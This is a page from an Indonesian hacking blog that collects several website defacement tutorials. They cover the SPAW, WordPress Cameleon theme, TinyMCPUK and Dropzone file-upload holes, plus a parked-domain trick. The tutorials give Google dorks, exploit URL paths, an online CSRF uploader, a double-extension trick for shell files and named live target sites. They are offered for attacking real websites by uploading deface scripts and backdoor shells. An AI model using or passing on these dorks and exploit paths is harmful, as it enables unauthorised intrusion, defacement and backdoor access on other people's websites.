Langsung ke konten utama

Postingan

Menampilkan postingan dari Desember, 2019

Cara Deface spaw upload

Deface Spaw Upload Vulnerability + Live Target

Bahan-bahan :
1. HP/PC
2. Kuota (wajib)
3. Jembud (wajib)
4. Dork :

** inurl:"spaw2/upload/files/"

5. Script deface.

** ext : .txt / .html

6. Exploit :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Langkah-langkah :
1. Dorking lah njink kek biasa.

2. Jika udah nemu masukkan exploit nya, seperti dibawah.

www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

atau

www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

3. Cari tulisan image, pencet, rubah jadi file.

4. Pilih file, upload.

5. Cari filenya, cari tulisan "download file"

6. Pencet tuh, auto ke tab baru..

Udah deh, kelar..

Deface metode wp chameleon

Assalamualaikum wr wb
Kembali lagi dengan Sayah Randi;v
Oke jangan banyak bacot langsung aja ke tutor nya;v
•  Bahan bahan :
1. Android/PC
2. kuota/WiFi
3. Script Deface
4. Tools Crsf > Touch Me Senpai


> Dork :
- inurl:/wp-content/themes/cameleon/
> Exploit :
- /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

•  Langkah- langkah :

Pertama kalian dorking google dulu pakek dork di atas.

Nahh kalo udah pilih salah satu web nya.
Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas.

Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Kalo vuln kek gambar di bawah ini.
Nah klo udah begitu kita tinggal ke crsf nya



Kolom URL isi link web vuln tadi,POST File isi dengan qqfile kemudian klik Kunci.

Deface Tinymcpuk mediatech

Kembali lagi dengan Sayah; v
Oke aja langsung gasken ke tutor nyah;v

Bahan & Alat
1. Hp/pc
2. Browser kesayangan
3. Dork : All rights reserved. © 2015 Media Tech Indonesia
4. Exploit : /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
5. Shell/Script deface. Extensi tambahin .fla

HTML : asw.htm.fla
PHP : asw.php.fla

Live Target
http://www.rentalmobilsurabaya.org/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Langkah-langkah :
1. Dorking dulu lah sampe nemu target, buat belajar tu diatas ada live.

2. Udah nemu target? Masukkin exploitnya, contoh :

target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

3. Lihat bawah......
Ada tuh tempat upload, ya udah tinggal upload, mau shell/script deface, w nitip aja yak :v ya kerna emang ga support php cuk :'v

4. Jika sudah upload, tinggal panggil scriptnya seperti ini.

target.com/tinymcpuk/gambar/Flash/asw.php.fl…

Deface Dropzone file upload

• Dropzone File Upload


Welcome back sama aeng Randi ;v
Gasken lah ke tutor nya;v

Bahan-bahan :
1. Shell backdoor
2. Script deface
3. CSRF Online
http://lightcyberindonesia.freevar.com/tools/csrf.php
4. Dork :
** inurl:/dropzone/upload/
5. Exploit : /dropzone/upload.php

Langkah-langkah :
1. Dorking dulu lah, pake otak smart kalian. Teros kalo udh nemu target, masukkan exploit.

Contoh:
www.asu.go.id/[path]/dropzone/upload.php

Jika blank putih/layar kosong, itu vuln cuk

2. Pergi ke CSRF online, masukkan postfilenya : file

3. Upload deh mau shell/script deface. Shell kalo web yg bisa up shell.

Hehe :)

Se you next time

Deface poc Parked domain

Hello Guyess saya ./RandiGns Oke sesuai judul jadi jangan banyak bacot ya guyes-_- Bahan Bahan Yang Dibutuhkan :
000webhost
HackerTarget.com (buat reverse ip)
- Sc Deface/Shell
- Hp/Laptop
- Kuota / wifi Step 1 :

Kalian Daftar/Login Di 000webhost , Berhubung Gua Udh Ada , Jadi Gua Gausah Daftar Ea


Step 2 :


Jika Sudah, Nanti Kalian Disuruh Buat Web Contohnya : "namaweb.000webhost.com" nah kalian isi sesuka kalian aja :"

Lalu Selesai, Kalian Akan Muncul Tampilan Seperti Ini :

Kalau Tampilan Sudah Seperti Itu, Tinggal Kalian , Klik Web Yang Habis Kalian Bikin >_<

Step 3 :

Jika Sudah Maka Akan Muncul Tampilan Seperti Ini :

Kalau Sudah, Kalian Klick/Pencet Bacaan "Tools" yang Ada Di Sebelah Kiri
Kalau Sudah Di Klick , Maka Tampilan nya Akan Seperti Ini :

Kalian Klick Lagi Tulisan "File Manager" Yang ada Di sebelah Kiri, Lalu Kalian Klick "Upload Files"

Jika Sudah , Kalian Tinggal Upload Sc Deface Kalian Atau Shell
Upload nya Dimana? Use Your Brain :)

 …